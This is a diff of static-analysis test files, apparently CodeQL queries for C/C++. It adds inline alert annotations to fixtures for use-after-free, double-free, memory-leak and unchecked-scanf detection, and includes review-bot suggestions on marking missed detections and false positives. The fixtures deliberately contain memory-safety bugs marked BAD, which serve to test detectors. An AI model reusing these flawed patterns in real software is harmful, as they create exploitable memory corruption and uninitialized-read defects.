@@ -86,7 +86,7 @@ void myClass2 :: method1() array5 = (int *)malloc(sizeof(int) * 100); array6 = (int *)malloc(sizeof(int) * 100); array7 = (int *)malloc(sizeof(int) * 100); - array8 = (int *)malloc(sizeof(int) * 100); // never freed + array8 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array3); free(array5); @@ -153,8 +153,8 @@ int overloadedNew() { new(buf) int[1]; // GOOD *(int*)buf = 4; - new(std::nothrow) int(3); // BAD - new(std::nothrow) int[2]; // BAD + new(std::nothrow) int(3); // BAD // $ Alert[cpp/memory-never-freed] + new(std::nothrow) int[2]; // BAD // $ Alert[cpp/memory-never-freed] return 0; } @@ -166,7 +166,7 @@ void output_msg(const char *msg); void test_strdup() { char msg[] = "OctoCat"; - char *cpy = strdup(msg); // BAD + char *cpy = strdup(msg); // BAD // $ Alert[cpp/memory-never-freed] output_msg(cpy); } @@ -210,14 +210,14 @@ void test_reassignment() { char *a = (char *)malloc(128); char *b = (char *)malloc(128); - free(a); - a[0] = 0; // BAD + free(a); // $ Source[cpp/use-after-free] + a[0] = 0; // BAD // $ Alert[cpp/use-after-free] a = b; a[0] = 0; // GOOD - free(a); - a[0] = 0; // BAD + free(a); // $ Source[cpp/use-after-free] + a[0] = 0; // BAD // $ Alert[cpp/use-after-free] DataPair p; p.data1 = new char[128]; @@ -225,8 +225,8 @@ void test_reassignment() { p.data1[0] = 0; // GOOD p.data2[0] = 0; // GOOD - delete [] p.data1; - p.data1[0] = 0; // BAD + delete [] p.data1; // $ Source[cpp/use-after-free] + p.data1[0] = 0; // BAD // $ Alert[cpp/use-after-free] p.data2[0] = 0; // GOOD p.data1 = new char[128]; diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp index 0a6532015a76..afc0b428f060 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp 
@@ -8,10 +8,10 @@ int asprintf(char ** strp, const char * fmt, ...); void* test_double_free1(int *a) { - free(a); // GOOD - a[5] = 5; // BAD - *a = 5; // BAD - free(a); // BAD + free(a); // GOOD // $ Source[cpp/double-free] Source[cpp/use-after-free] + a[5] = 5; // BAD // $ Alert[cpp/use-after-free] + *a = 5; // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] a = (int*) malloc(8); free(a); // GOOD a = (int*) malloc(8); @@ -27,28 +27,28 @@ void test_double_free_aliasing(void *a, void* b) { } void test_dominance1(void *a) { - free(a); - if (condition()) free(a); // BAD + free(a); // $ Source[cpp/double-free] + if (condition()) free(a); // BAD // $ Alert[cpp/double-free] } void test_dominance2(void *a) { - free(a); - if (condition()) a = malloc(10); - if (condition()) free(a); // BAD + free(a); // $ Source[cpp/double-free] + if (condition()) a = malloc(10); // $ Alert[cpp/memory-may-not-be-freed] + if (condition()) free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance1(int *a) { - if (condition()) free(a); + if (condition()) free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] if (condition()) a[2] = 5; // BAD [NOT DETECTED] - if (condition()) free(a); // BAD [NOT DETECTED] - a[2] = 5; // BAD - free(a); // BAD + if (condition()) free(a); // BAD [NOT DETECTED] // $ Source[cpp/double-free] Source[cpp/use-after-free] + a[2] = 5; // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance2(void *a) { - if (condition()) free(a); - free(a); // BAD + if (condition()) free(a); // $ Source[cpp/double-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance3(void *a) { 
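Review bot: In `test_post_dominance1` the line `if (condition()) a[2] = 5; // BAD [NOT DETECTED]` gets no annotation, and the following `if (condition()) free(a); // BAD [NOT DETECTED]` is annotated only as a `Source`, so the known misses of the use-after-free and double-free queries remain visible only in free-text comments. Marking them with the `MISSING:` prefix, e.g. `// BAD [NOT DETECTED] // $ MISSING: Alert[cpp/use-after-free]`, keeps the detection gap inside the checked expectations. `return a; // BAD` in `use_after_free` (hunk `@@ -80,27`) is likewise left without any expectation and, judging by the rows added to UseAfterFree.expected, produces no alert.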
@@ -66,10 +66,10 @@ void test_use_after_free6(int *a, int *b) { void test_use_after_free7(int *a) { a[0] = 42; - free(a); + free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] - if (a[3]) { // BAD - free(a); // BAD + if (a[3]) { // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } } @@ -80,27 +80,27 @@ class A { void test_new1() { A *a = new A(); - delete(a); - a->f(); // BAD - delete(a); // BAD + delete(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + a->f(); // BAD // $ Alert[cpp/use-after-free] + delete(a); // BAD // $ Alert[cpp/double-free] } void test_dereference1(A *a) { a->f(); // GOOD - free(a); - a->f(); // BAD + free(a); // $ Source[cpp/use-after-free] + a->f(); // BAD // $ Alert[cpp/use-after-free] } void* use_after_free(void *a) { - free(a); - use(a); // BAD + free(a); // $ Source[cpp/use-after-free] + use(a); // BAD // $ Alert[cpp/use-after-free] return a; // BAD } void test_realloc1(void *a) { - free(a); - void *b = realloc(a, sizeof(a)*3); // BAD [NOT DETECTED by cpp/double-free] - free(a); // BAD + free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + void *b = realloc(a, sizeof(a)*3); // BAD [NOT DETECTED by cpp/double-free] // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] free(b); // GOOD } void* test_realloc2(char *a) { @@ -125,8 +125,8 @@ void test_realloc3(void *a) { void test_ptr_deref(void ** a) { free(*a); *a = malloc(10); - free(*a); // GOOD - free(*a); // BAD + free(*a); // GOOD // $ Source[cpp/double-free] + free(*a); // BAD // $ Alert[cpp/double-free] *a = malloc(10); free(a[0]); // GOOD free(a[1]); // GOOD 
@@ -149,9 +149,9 @@ void test_loop1(struct list ** list_ptr) { } void test_use_after_free8(struct list * a) { - if (condition()) free(a); - a->data = malloc(10); // BAD - free(a); // BAD + if (condition()) free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + a->data = malloc(10); // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_loop2(char ** a) { @@ -164,7 +164,7 @@ void test_loop2(char ** a) { void* test_realloc4() { void *a = 0; - void *b = realloc(a, 10); // BAD for cpp/memory-never-freed + void *b = realloc(a, 10); // BAD for cpp/memory-never-freed // $ Alert[cpp/memory-never-freed] if (!b) { return a; } return b; } @@ -204,9 +204,9 @@ char* test_return2(char *a) { void test_condition1(char *a) { free(a); if (asprintf(&a, "Hello world") || condition()); - free(a); //GOOD + free(a); //GOOD // $ Source[cpp/double-free] if (condition() || asprintf(&a, "Hello world")); - free(a); // BAD + free(a); // BAD // $ Alert[cpp/double-free] } void test_condition2(char *a) { @@ -230,27 +230,27 @@ void test_ms_free(void * memory_descriptor_list) { void test_loop3(char ** a, char ** b) { if (*a) { - free(*a); + free(*a); // $ Source[cpp/use-after-free] a++; } - use(*a); // GOOD [FALSE POSITIVE] + use(*a); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] for (;*b; b++) { - free(*b); + free(*b); // $ Source[cpp/use-after-free] } - use(*b); // GOOD [FALSE POSITIVE] + use(*b); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] } void test_deref(char **a) { - free(*a); - use(*a); // GOOD [FALSE POSITIVE] + free(*a); // $ Source[cpp/use-after-free] + use(*a); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] } // Refs void test_ref(char *&p) { free(p); - p = (char *)malloc(sizeof(char)*10); + p = (char *)malloc(sizeof(char)*10); // $ Alert[cpp/memory-never-freed] use(p); // GOOD free(p); // GOOD } 
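Review bot: In `test_ref` the new `$ Alert[cpp/memory-never-freed]` on `p = (char *)malloc(sizeof(char)*10);` sits two lines above `free(p); // GOOD`, so the expectation appears to encode a false positive without saying so. If that reading is right, the line should carry the file's usual comment and the spurious marker, e.g. `// GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert[cpp/memory-never-freed]`. `test_ref_delete` (`p = new int;` followed by `delete p; // GOOD`) and `test_free_assign` (`malloc(10)` released through `free(b = a); // GOOD`) in hunk `@@ -258,13` look the same.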
@@ -258,13 +258,13 @@ void test_ref(char *&p) { void test_ref_delete(int *&p) { delete p; - p = new int; + p = new int; // $ Alert[cpp/memory-never-freed] use(p); // GOOD delete p; // GOOD } void test_free_assign() { - void *a = malloc(10); + void *a = malloc(10); // $ Alert[cpp/memory-may-not-be-freed] void *b; free(b = a); // GOOD } @@ -274,13 +274,13 @@ struct MyStruct { }; void test_free_struct(MyStruct* s) { - free(s->buf); - char c = s->buf[0]; // BAD + free(s->buf); // $ Source[cpp/use-after-free] + char c = s->buf[0]; // BAD // $ Alert[cpp/use-after-free] } void test_free_struct2(MyStruct s) { - free(s.buf); - char c = s.buf[0]; // BAD + free(s.buf); // $ Source[cpp/use-after-free] + char c = s.buf[0]; // BAD // $ Alert[cpp/use-after-free] } void test_free_struct3(MyStruct s) { @@ -290,16 +290,16 @@ void test_free_struct3(MyStruct s) { } void test_free_struct4(char* buf, MyStruct s) { - free(buf); + free(buf); // $ Source[cpp/use-after-free] s.buf = buf; - char c = s.buf[0]; // BAD + char c = s.buf[0]; // BAD // $ Alert[cpp/use-after-free] } void g_free (void*); void test_g_free(char* buf) { - g_free(buf); - g_free(buf); // BAD + g_free(buf); // $ Source[cpp/double-free] + g_free(buf); // BAD // $ Alert[cpp/double-free] } // inspired by real world FPs 
@@ -310,26 +310,26 @@ void test_goto() { *a = 1; // GOOD if (condition()) { - delete a; + delete a; // $ Source[cpp/use-after-free] goto after; } *a = 1; // GOOD if (condition()) { - delete a; + delete a; // $ Source[cpp/double-free] Source[cpp/use-after-free] } - *a = 1; // BAD (use after free) - delete a; // BAD (double free) + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] + delete a; // BAD (double free) // $ Alert[cpp/double-free] Source[cpp/use-after-free] after: - *a = 1; // BAD (use after free) + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] } void test_reassign() { int *a = (int *)malloc(sizeof(int)); *a = 1; // GOOD - delete a; - *a = 1; // BAD (use after free) + delete a; // $ Source[cpp/use-after-free] + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] a = (int *)malloc(sizeof(int)); *a = 1; // GOOD delete a; @@ -362,10 +362,10 @@ void test(E* e) { void test_return_by_parameter(int **out_i, MyStruct **out_ms) { int *a = (int *)malloc(sizeof(int)); // GOOD (freed) int *b = (int *)malloc(sizeof(int)); // GOOD (out parameter) - int *d = (int *)malloc(sizeof(int)); // BAD (not freed) + int *d = (int *)malloc(sizeof(int)); // BAD (not freed) // $ Alert[cpp/memory-never-freed] MyStruct *e = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD (freed) MyStruct *f = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD (out parameter) - MyStruct *h = (MyStruct *)malloc(sizeof(MyStruct)); // BAD (not freed) + MyStruct *h = (MyStruct *)malloc(sizeof(MyStruct)); // BAD (not freed) // $ Alert[cpp/memory-never-freed] free(a); *out_i = b; diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref index b166b6b60b9c..39a4f630f4ca 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref 
@@ -1 +1,2 @@
-Critical/IncorrectCheckScanf.ql
\ No newline at end of file
+query: Critical/IncorrectCheckScanf.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected
index 9b7564b9123d..e9c1038e5a4f 100644
--- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected
+++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected
@@ -1,3 +1,25 @@ +#select +| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | +| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | +| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | +| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | +| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | +| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | +| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:114:3:114:8 | call to sscanf | call to sscanf | +| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | +| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | +| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | +| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | +| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | +| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | +| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:403:6:403:11 | call to sscanf | call to sscanf | +| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | +| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | +| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | +| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | +| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | +| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | +| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. 
It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | edges | test.c:10:31:10:32 | sscanf output argument | test.c:11:7:11:7 | x | provenance | | | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | provenance | | 
@@ -164,25 +186,3 @@ nodes | test.cpp:575:30:575:31 | scanf output argument | semmle.label | scanf output argument | | test.cpp:577:9:577:9 | i | semmle.label | i | subpaths -#select -| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | -| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | -| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | -| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | -| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | -| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:107:3:107:8 | call to fscanf | call to fscanf | -| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | -| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | -| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | -| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | -| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | -| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | -| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. 
| test.cpp:291:3:291:7 | call to scanf | call to scanf | -| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | -| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | -| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | -| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | -| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | -| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | -| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. 
It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | -| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref index 97e85b5abbea..7d6dbd18683f 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref @@ -1 +1,2 @@ -Critical/MissingCheckScanf.ql \ No newline at end of file +query: Critical/MissingCheckScanf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp index 346cf607977b..f1f5e36ed251 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp @@ -31,8 +31,8 @@ int main() { int i; - scanf("%d", &i); - use(i); // BAD: may not have written `i` + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { @@ -64,8 +64,8 @@ int main() { int i; // Reused variable - scanf("%d", &i); - use(i); // BAD + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD // $ Alert[cpp/missing-check-scanf] if (scanf("%d", &i) == 1) { @@ -76,8 +76,8 @@ int main() { int i; // Reset variable - scanf("%d", &i); - use(i); // BAD + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD // $ Alert[cpp/missing-check-scanf] i = 1; use(i); // GOOD 
@@ -86,16 +86,16 @@ int main() { int *i = (int*)malloc(sizeof(int)); // Allocated variable - scanf("%d", i); - use(*i); // BAD + scanf("%d", i); // $ Source[cpp/missing-check-scanf] + use(*i); // BAD // $ Alert[cpp/missing-check-scanf] free(i); // GOOD } { int *i = new int; // Allocated variable - scanf("%d", i); - use(*i); // BAD + scanf("%d", i); // $ Source[cpp/missing-check-scanf] + use(*i); // BAD // $ Alert[cpp/missing-check-scanf] delete i; // GOOD } @@ -104,15 +104,15 @@ int main() { int i; - fscanf(get_a_stream(), "%d", &i); - use(i); // BAD: may not have written `i` + fscanf(get_a_stream(), "%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { int i; - sscanf(get_a_string(), "%d", &i); - use(i); // BAD: may not have written `i` + sscanf(get_a_string(), "%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { @@ -159,7 +159,7 @@ int main() { int i; - if (scanf("%d", &i) != 0) + if (scanf("%d", &i) != 0) // $ Alert[cpp/incorrectly-checked-scanf] { use(i); // BAD: scanf can return EOF } @@ -168,7 +168,7 @@ int main() { int i; - if (scanf("%d", &i) == 0) + if (scanf("%d", &i) == 0) // $ Alert[cpp/incorrectly-checked-scanf] { use(i); // BAD: checks return value incorrectly } @@ -190,7 +190,7 @@ int main() bool b; int i; - b = scanf("%d", &i); + b = scanf("%d", &i); // $ Alert[cpp/incorrectly-checked-scanf] if (b >= 1) { @@ -201,7 +201,7 @@ int main() { int i; - if (scanf("%d", &i)) + if (scanf("%d", &i)) // $ Alert[cpp/incorrectly-checked-scanf] use(i); // BAD } @@ -218,10 +218,10 @@ int main() { int i, j; - if (scanf("%d %d", &i, &j) >= 1) + if (scanf("%d %d", &i, &j) >= 1) // $ Source[cpp/missing-check-scanf] { use(i); // GOOD - use(j); // BAD: checks return value incorrectly + use(j); // BAD: checks return value incorrectly // $ Alert[cpp/missing-check-scanf] } } 
@@ -243,13 +243,13 @@ int main() if (maybe()) { break; } - else if (maybe() && (scanf("%5c %d", c, &d) == 1)) { // GOOD + else if (maybe() && (scanf("%5c %d", c, &d) == 1)) { // GOOD // $ Source[cpp/missing-check-scanf] use(*(int *)c); // GOOD - use(d); // BAD + use(d); // BAD // $ Alert[cpp/missing-check-scanf] } - else if ((scanf("%5c %d", c, &d) == 1) && maybe()) { // GOOD + else if ((scanf("%5c %d", c, &d) == 1) && maybe()) { // GOOD // $ Source[cpp/missing-check-scanf] use(*(int *)c); // GOOD - use(d); // BAD + use(d); // BAD // $ Alert[cpp/missing-check-scanf] } } } @@ -268,16 +268,16 @@ int main() int i; set_by_ref(i); - scanf("%d", &i); - use(i); // GOOD [FALSE POSITIVE] + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // GOOD [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } { int i; set_by_ptr(&i); - scanf("%d", &i); - use(i); // GOOD [FALSE POSITIVE] + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // GOOD [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } { @@ -288,8 +288,8 @@ int main() i = 0; } - scanf("%d", &i); - use(i); // BAD: `i` may not have been initialized + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: `i` may not have been initialized // $ Alert[cpp/missing-check-scanf] } // --- different use --- @@ -400,8 +400,8 @@ char *my_string_copy() { for (int i = 0; i < len; i += 2) { unsigned int u; - sscanf(src + i, "%2x", &u); - *ptr++ = (char) u; // GOOD [FALSE POSITIVE]? src+i+{0,1} are always valid %x digits, so this should be OK. + sscanf(src + i, "%2x", &u); // $ Source[cpp/missing-check-scanf] + *ptr++ = (char) u; // GOOD [FALSE POSITIVE]? src+i+{0,1} are always valid %x digits, so this should be OK. // $ Alert[cpp/missing-check-scanf] } *ptr++ = 0; return DST_STRING; 
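Review bot: The known false positives in the `-268,16` hunk (`use(i); // GOOD [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf]`, after `set_by_ref(i)` and `set_by_ptr(&i)`) are now recorded as ordinary expected alerts, so the test framework cannot tell them apart from the real BAD cases. The same applies to the `-400,8`, `-410,17` and `-452,47` hunks. In the last of these, `use(value); // GOOD // $ Alert[cpp/missing-check-scanf]` in `disjunct_boolean_condition` and the uncommented `use(value);` in `check_for_negative_test` lack even the `[FALSE POSITIVE]` comment, although the preceding checks return on 0 and on negative results. Marking these lines with the framework's spurious form, e.g. `// $ SPURIOUS: Alert[cpp/missing-check-scanf]`, would keep the precision gap visible and make the test fail once the query is fixed; whether the matching `Source` tags need the same treatment should be confirmed against the postprocessing query. The enclosing functions continue outside these hunks.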
